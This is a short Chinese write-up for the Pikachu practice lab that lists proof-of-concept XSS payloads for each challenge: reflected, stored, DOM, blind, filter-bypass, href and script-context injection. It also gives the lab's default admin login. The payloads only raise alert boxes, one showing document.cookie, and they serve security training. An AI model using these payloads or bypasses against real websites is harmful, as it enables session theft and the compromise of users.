Pikachu漏洞靶场 XSS(跨站脚本攻击)
XSS
关于xss的我也是一知半解,所以只放出payload来。
反射型xss(get)
修改maxlength属性之后提交如下内容:
<script>alert(/xss/);</script>
反射型xss(post)
登录之后提交如下内容:
<script>alert(document.cookie);</script>
存储型xss
提交如下内容:
<script>alert(/xss/);</script>
DOM型xss、xss-x
提交如下内容,鼠标点击a标签时就会弹窗。
#' οnclick=alert(/xss/)>
xss之盲打
在xss_blind.php提交如下内容:
<script>alert(/xss/);</script>
然后进入后台admin_login.php,admin,123456登录
进入后台就会弹窗。
xss之过滤
提交如下内容就会弹窗:
<img src=# onerror=alert(/xss/)>
XSS之htmlspecialchars、xss之href输出
提交如下内容,点击a标签就会弹窗:
javascript:alert(/xss/)
xss之js输出
提交如下内容闭合script标签即可弹窗:
</script><script>alert(/xss/)</script>

浙公网安备 33010602011771号